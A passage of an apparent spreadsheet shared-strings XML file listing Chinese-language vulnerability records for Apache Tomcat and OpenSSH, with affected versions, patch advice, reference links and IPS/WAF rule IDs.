  </si>
  <si>
    <t>影响Tomcat:6.0.0版本(含)到6.0.35版本(含),7.0.0版本(含)到7.0.31版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://tomcat.apache.org/security-6.htmlhttp://tomcat.apache.org/security-7.html</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201212-054
http://svn.apache.org/viewvc?view=revision&amp;revision=1393088</t>
  </si>
  <si>
    <t>Apache Tomcat 数字错误漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.0版本(含)到6.0.39版本(含),7.0.0版本(含)到7.0.52版本(含),8.0.0版本(含)到8.0.3版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.53</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201405-585</t>
  </si>
  <si>
    <t>Apache Tomcat 安全绕过漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.0版本(含)到6.0.35版本(含),7.0.0版本(含)到7.0.27版本(含)</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201212-056
http://svn.apache.org/viewvc/tomcat/tc7.0.x/trunk/java/org/apache/catalina/realm/RealmBase.java?r1=1377892&amp;r2=1377891&amp;pathrev=1377892</t>
  </si>
  <si>
    <t>ips-10071059（无效）</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201212-055
http://svn.apache.org/viewvc/tomcat/tc7.0.x/trunk/java/org/apache/tomcat/util/net/NioEndpoint.java?r1=1340218&amp;r2=1340217&amp;pathrev=1340218</t>
  </si>
  <si>
    <t>Apache Tomcat cookie 序列值 敏感信息泄露漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:4.1.0版本(含)到4.1.36版本(含),5.5.0版本(含)到5.5.25版本(含),6.0.0版本(含)到6.0.14版本(含)</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200802-164</t>
  </si>
  <si>
    <t>Apache Tomcat 资源管理错误漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.0版本(含)到6.0.43版本(含),7.0.0版本(含)到7.0.54版本(含),8.0.0版本(含)到8.0.8版本(含)</t>
  </si>
  <si>
    <t>http://tomcat.apache.org/security-7.html</t>
  </si>
  <si>
    <t>Apache Tomcat 输入验证错误漏洞</t>
  </si>
  <si>
    <t>ips-11021338, waf-11021338（有效）</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.0版本(含)到6.0.37版本(含),7.0.0版本(含)到7.0.29版本(含),8.0.0-RC1版本(含)到8.0.0-RC5版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://svn.apache.org/viewvc?view=revision&amp;revision=1378921http://svn.apache.org/viewvc?view=revision&amp;revision=1476592</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201305-226</t>
  </si>
  <si>
    <t>OpenSSH 远程代码执行漏洞(CVE-2024-6387)</t>
  </si>
  <si>
    <t>OpenSSH: 8.8</t>
  </si>
  <si>
    <t>攻击者可以利用该漏洞执行任意代码，导致服务器失陷</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，请受影响客户将Openssh更新到安全版本：OpenSSH &gt; 9.8p1。下载链接：https://www.openssh.com/releasenotes.html</t>
  </si>
  <si>
    <t>https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server</t>
  </si>
  <si>
    <t>Apache Tomcat SSL端口空请求 设计错误漏洞(CVE-2007-6286)</t>
  </si>
  <si>
    <t>影响Tomcat:5.5.11版本(含)到5.5.25版本(含),6.0.0版本(含)到6.0.15版本(含)</t>
  </si>
  <si>
    <t>http://www.kb.cert.org/vuls/id/545804
www.oracle.com
http://www.oracle.com/technetwork/topics/security/cpujan2006-082403.html
http://xforce.iss.net/xforce/xfdb/24321
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200802-165</t>
  </si>
  <si>
    <t>Apache Tomcat 本地提权漏洞(CVE-2016-5425)</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.0版本(含)到6.0.45版本(含),7.0.0版本(含)到7.0.69版本(含),8.0.0版本(含)到8.0.35版本(含)</t>
  </si>
  <si>
    <t>参见《Apache Tomcat 本地提权漏洞(CVE-2016-5425)-修复方案》</t>
  </si>
  <si>
    <t>https://blog.csdn.net/bandongshen9543/article/details/101532828
https://tomcat.apache.org/
https://www.cnblogs.com/shuimublog/p/16478166.html</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://tomcat.apache.org/tomcat-6.0-doc/changelog.html</t>
  </si>
  <si>
    <t>http://www.us-cert.gov/cas/techalerts/TA08-017A.html
www.oracle.com
http://www.oracle.com/technetwork/topics/security/cpujan2008-086860.html
http://marc.info/?l=bugtraq&amp;amp;m=120058413923005&amp;amp;w=2
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201503-525</t>
  </si>
  <si>
    <t>Apache Tomcat 安全漏洞（CVE-2017-5647）</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.0版本(含)到6.0.52版本(含),7.0.0版本(含)到7.0.76版本(含),8.0.0版本(含)到8.0.42版本(含),8.5.0版本(含)到8.5.12版本(含),9.0.0版本(含)到9.0.0.M18版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接https://lists.apache.org/thread.html/5796678c5a773c6f3ff57c178ac247d85ceca0dee9190ba48171451a@%3Cusers.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>https://lists.apache.org/thread.html/5796678c5a773c6f3ff57c178ac247d85ceca0dee9190ba48171451a@%3Cusers.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>Apache Tomcat RequestDispatcher信息泄露漏洞（CVE-2008-5515）</t>
  </si>
  <si>
    <t>ips-11020840（有效）</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://svn.apache.org/viewvc?view=rev&amp;revision=782763 http://svn.apache.org/viewvc?view=rev&amp;revision=783292</t>
  </si>
  <si>
    <t>Apache Tomcat WAR文件名目录遍历漏洞(CVE-2009-2902)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：Ubuntu Ubuntu Linux 9.10 sparcUbuntu libservlet2.5-java-doc_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/libservlet2.5-ja va-doc_6.0.20-2ubuntu2.1_all.debUbuntu libservlet2.5-java_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/libservlet2.5-ja va_6.0.20-2ubuntu2.1_all.debUbuntu libtomcat6-java_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/libtomcat6-java_ 6.0.20-2ubuntu2.1_all.debUbuntu tomcat6-admin_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-admin_6. 0.20-2ubuntu2.1_all.debUbuntu tomcat6-common_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-common_6 .0.20-2ubuntu2.1_all.debUbuntu tomcat6-docs_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-docs_6.0 .20-2ubuntu2.1_all.debUbuntu tomcat6-examples_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-examples _6.0.20-2ubuntu2.1_all.debUbuntu tomcat6-user_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-user_6.0 .20-2ubuntu2.1_all.debUbuntu tomcat6_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6_6.0.20-2 ubuntu2.1_all.debUbuntu Ubuntu Linux 9.10 powerpcUbuntu libservlet2.5-java-doc_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/libservlet2.5-ja va-doc_6.0.20-2ubuntu2.1_all.debUbuntu libservlet2.5-java_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/libservlet2.5-ja va_6.0.20-2ubuntu2.1_all.debUbuntu libtomcat6-java_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/libtomcat6-java_ 6.0.20-2ubuntu2.1_all.debUbuntu tomcat6-admin_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-admin_6. 0.20-2ubuntu2.1_all.debUbuntu tomcat6-common_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-common_6 .0.20-2ubuntu2.1_all.debUbuntu tomcat6-docs_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-docs_6.0 .20-2ubuntu2.1_all.debUbuntu tomcat6-examples_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-examples _6.0.20-2ubuntu2.1_all.debUbuntu tomcat6-user_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-user_6.0 .20-2ubuntu2.1_all.debUbuntu tomcat6_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6_6.0.20-2 ubuntu2.1_all.debUbuntu Ubuntu Linux 9.10 lpiaUbuntu libservlet2.5-java-doc_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/libservlet2.5-ja va-doc_6.0.20-2ubuntu2.1_all.debUbuntu libservlet2.5-java_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/libservlet2.5-ja va_6.0.20-2ubuntu2.1_all.debUbuntu libtomcat6-java_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/libtomcat6-java_ 6.0.20-2ubuntu2.1_all.debUbuntu tomcat6-admin_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-admin_6. 0.20-2ubuntu2.1_all.debUbuntu tomcat6-common_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-common_6 .0.20-2ubuntu2.1_all.debUbuntu tomcat6-docs_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-docs_6.0 .20-2ubuntu2.1_all.debUbuntu tomcat6-examples_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-examples _6.0.20-2ubuntu2.1_all.debUbuntu tomcat6-user_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-user_6.0 .20-2ubuntu2.1_all.debUbuntu tomcat6_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6_6.0.20-2 ubuntu2.1_all.debUbuntu Ubuntu Linux 9.04 sparcUbuntu tomcat6_6.0.18-0ubuntu6.2_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6_6.0.18-0 ubuntu6.2_all.debUbuntu Ubuntu Linux 9.04 powerpcUbuntu tomcat6_6.0.18-0ubuntu6.2_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6_6.0.18-0 ubuntu6.2_all.debUbuntu Ubuntu Linux 9.04 i386Ubuntu tomcat6_6.0.18-0ubuntu6.2_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6_6.0.18-0 ubuntu6.2_all.debUbuntu Ubuntu Linux 9.04 lpiaUbuntu tomcat6_6.0.18-0ubuntu6.2_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6_6.0.18-0 ubuntu6.2_all.debUbuntu Ubuntu Linux 9.10 i386Ubuntu libservlet2.5-java-doc_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/libservlet2.5-ja va-doc_6.0.20-2ubuntu2.1_all.debUbuntu libservlet2.5-java_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/libservlet2.5-ja va_6.0.20-2ubuntu2.1_all.debUbuntu libtomcat6-java_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/libtomcat6-java_ 6.0.20-2ubuntu2.1_all.debUbuntu tomcat6-admin_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-admin_6. 0.20-2ubuntu2.1_all.debUbuntu tomcat6-common_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-common_6 .0.20-2ubuntu2.1_all.debUbuntu tomcat6-docs_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-docs_6.0 .20-2ubuntu2.1_all.debUbuntu tomcat6-examples_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-examples _6.0.20-2ubuntu2.1_all.debUbuntu tomcat6-user_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-user_6.0 .20-2ubuntu2.1_all.debUbuntu tomcat6_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6_6.0.20-2 ubuntu2.1_all.debUbuntu Ubuntu Linux 9.10 amd64Ubuntu libservlet2.5-java-doc_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/libservlet2.5-ja va-doc_6.0.20-2ubuntu2.1_all.debUbuntu libservlet2.5-java_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/libservlet2.5-ja va_6.0.20-2ubuntu2.1_all.debUbuntu libtomcat6-java_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/libtomcat6-java_ 6.0.20-2ubuntu2.1_all.debUbuntu tomcat6-admin_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-admin_6. 0.20-2ubuntu2.1_all.debUbuntu tomcat6-common_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-common_6 .0.20-2ubuntu2.1_all.debUbuntu tomcat6-docs_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-docs_6.0 .20-2ubuntu2.1_all.debUbuntu tomcat6-examples_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-examples _6.0.20-2ubuntu2.1_all.debUbuntu tomcat6-user_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-user_6.0 .20-2ubuntu2.1_all.debUbuntu tomcat6_6.0.20-2ubuntu2.1_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6_6.0.20-2 ubuntu2.1_all.debUbuntu Ubuntu Linux 9.04 amd64Ubuntu tomcat6_6.0.18-0ubuntu6.2_all.debhttp://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6_6.0.18-0 ubuntu6.2_all.deb</t>
  </si>
  <si>
    <t>Apache Tomcat JULI日志组件默认安全策略漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:5.5.9版本(含)到5.5.25版本(含),6.0.0版本(含)到6.0.15版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://svn.apache.org/viewvc/tomcat/trunk/conf/catalina.policy?r1=606594&amp;r2=606593&amp;pathrev=606594&amp;view=patch</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200712-325
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200712-325
http://tomcat.apache.org/security-5.html
http://tomcat.apache.org/security-6.html</t>
  </si>
  <si>
    <t>Apache Tomcat 访问控制错误漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.0版本(含)到6.0.43版本(含),7.0.0版本(含)到7.0.57版本(含),8.0.0版本(含)到8.0.15版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://tomcat.apache.org/security-8.html</t>
  </si>
  <si>
    <t>https://seclists.org/bugtraq/2015/May/94
http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.0.17
http://tomcat.apache.org/security-8.html</t>
  </si>
  <si>
    <t>Apache Tomcat NIO Connector拒绝服务漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.0版本(含)到6.0.30版本(含),7.0.0版本(含)到7.0.6版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://svn.apache.org/viewvc?view=revision&amp;revision=1065939</t>
  </si>
  <si>
    <t>Apache Tomcat HTTP摘要式身份验证多个安全漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:7.0版本(含)到7.0.11版本(含),6版本(含)到6.0.32版本(含),5.5.0版本(含)到5.5.33版本(含)</t>
  </si>
  <si>
    <t>Apache Tomcat 'sort'和'orderBy'参数跨站脚本攻击漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.12版本(含)到6.0.29版本(含),7.0.0版本(含)到7.0.4版本(含)</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201011-243
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-7.html</t>
  </si>
  <si>
    <t>Apache Tomcat replay-countermeasure功能安全漏洞</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201211-313
http://svn.apache.org/viewvc?view=revision&amp;revision=1377807</t>
  </si>
  <si>
    <t>Apache Tomcat Authentication Header Realm Name信息泄露漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:5.5.0版本(含)到5.5.29版本(含),6.0.0版本(含)到6.0.26版本(含)</t>
  </si>
  <si>
    <t>Updates are available. Please see the references for more information.</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201004-393
https://lists.apache.org/thread.html/06cfb634bc7bf37af7d8f760f118018746ad8efbd519c4b789ac9c2e@%3Cdev.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-175
http://tomcat.apache.org/security-5.html#Fixed_in_Apache_Tomcat_5.5.34
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-174
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-175
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201108-269
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-176
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201107-180
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201108-510
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201106-334</t>
  </si>
  <si>
    <t>Apache Tomcat 代码问题漏洞</t>
  </si>
  <si>
    <t>ips-11020692（无效）</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.0版本(含)到6.0.41版本(含),7.0.0版本(含)到7.0.54版本(含),8.0.0版本(含)到8.0.8版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://tomcat.apache.org/security-6.html</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201502-328</t>
  </si>
  <si>
    <t>Apache Tomcat "host-manager/html/add文件" 跨站脚本漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:5.5.9版本(含)到5.5.26版本(含),6.0.0版本(含)到6.0.16版本(含)</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200806-068</t>
  </si>
  <si>
    <t>影响Tomcat:7.0.0版本(含)到7.0.50版本(含),6.0.0版本(含)到6.0.37版本(含),8.0.0版本,1.1.3版本,3.0.0版本,3.1.0版本,3.1.1版本,3.2.0版本(含)到3.2.4版本(含),3.3.0版本(含)到3.3.2版本(含),4.0.0版本(含)到4.0.6版本(含),4.1.0版本(含)到4.1.3版本(含),4.1.9版本,4.1.10版本,4.1.12版本,4.1.15版本,4.1.24版本,4.1.28版本,4.1.29版本,4.1.31版本,4.1.36版本,5.0.0版本(含)到5.0.30版本(含),5.5.0版本(含)到5.5.32版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://tomcat.apache.org/security-6.htmlhttp://tomcat.apache.org/security-7.htmlhttp://tomcat.apache.org/security-8.html</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201402-400</t>
  </si>
  <si>
    <t>影响Tomcat:7.0.0版本(含)到7.0.42版本(含),8.0.0版本,6.0.0版本(含)到6.0.37版本(含),1.1.3版本,3.0.0版本,3.1.0版本,3.1.1版本,3.2.0版本(含)到3.2.4版本(含),3.3.0版本(含)到3.3.2版本(含),4.0.0版本(含)到4.0.6版本(含),4.1.0版本(含)到4.1.3版本(含),4.1.9版本,4.1.10版本,4.1.12版本,4.1.15版本,4.1.24版本,4.1.28版本,4.1.29版本,4.1.31版本,4.1.36版本,5.0.0版本(含)到5.0.30版本(含),5.5.0版本(含)到5.5.32版本(含)</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201402-399
http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.47</t>
  </si>
  <si>
    <t>Apache Tomcat 权限许可和访问控制问题漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.0版本(含)到6.0.39版本(含),8.0.0版本(含)到8.0.5版本(含),7.0.0版本(含)到7.0.53版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.54</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201405-589
https://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201405-589
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201404-581</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201405-587
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004869
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004836
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004837
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004834
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004835
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004854
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004861
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004860
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004867
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201405-587
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201409-503
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201403-191
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201405-585
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201405-589
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201405-522
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201407-562
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201405-588
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201407-560
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201402-400
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201407-561
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201406-532
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201409-519
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201402-399
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201112-461</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201405-588
http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.53
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201405-585
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201405-587
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201405-588</t>
  </si>
  <si>
    <t>Apache Tomcat 信息泄露漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.0版本(含)到6.0.37版本(含),7.0.0版本(含)到7.0.47版本(含),8.0.0版本,8.0.0-RC1版本(含)到8.0.0-RC5版本(含)</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201402-401
http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.50
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201402-400
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201402-401</t>
  </si>
  <si>
    <t>Apache Tomcat 路径遍历漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.0版本(含)到6.0.44版本(含),7.0.0版本(含)到7.0.64版本(含),8.0.0版本(含)到8.0.26版本(含)</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201602-443
http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.65
http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.0.27
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201602-443</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.0版本(含)到6.0.45版本(含),7.0.0版本(含)到7.0.70版本(含),8.0.0版本(含)到8.0.36版本(含),8.5.0版本(含)到8.5.4版本(含),9.0.0版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://tomcat.apache.org/security-9.htmlhttp://tomcat.apache.org/security-8.htmlhttp://tomcat.apache.org/security-7.htmlhttp://tomcat.apache.org/security-6.html</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-828
https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.72
http://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.0.M10
https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.5_and_8.0.37
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-831
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-829
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-828
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-827
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-830</t>
  </si>
  <si>
    <t>Apache Tomcat 远程拒绝服务漏洞(CVE-2010-4476)</t>
  </si>
  <si>
    <t>影响Apache Tomcat:7.0.0版本(含)到7.0.6版本(含),6.0.0版本(含)到6.0.31版本(含),5.5.0版本(含)到5.5.32版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://tomcat.apache.org/security-7.html,https://tomcat.apache.org/security-6.html,https://tomcat.apache.org/security-5.html</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2010-4476
http://www-01.ibm.com/support/docview.wss?uid=swg21450666
https://www.ibm.com/support/knowledgecenter/SSEPGG_9.7.0/com.ibm.db2.luw.wn.doc/doc/c0056050.html?origURL=api/redirect/db2luw/v9r7/index.jsp
http://www-01.ibm.com/support/docview.wss?uid=swg1IC70473
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201111-203
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201102-241</t>
  </si>
  <si>
    <t>Apache Tomcat 远程代码执行漏洞(CVE-2016-3427)</t>
  </si>
  <si>
    <t>影响Apache Tomcat:9.0.0.M1版本(含)到9.0.0.M11版本(含),8.5.0版本(含)到8.5.6版本(含),8.0.0版本(含)到8.0.38版本(含),7.0.0版本(含)到7.0.72版本(含),6.0.0版本(含)到6.0.47版本(含)</t>
  </si>
  <si>
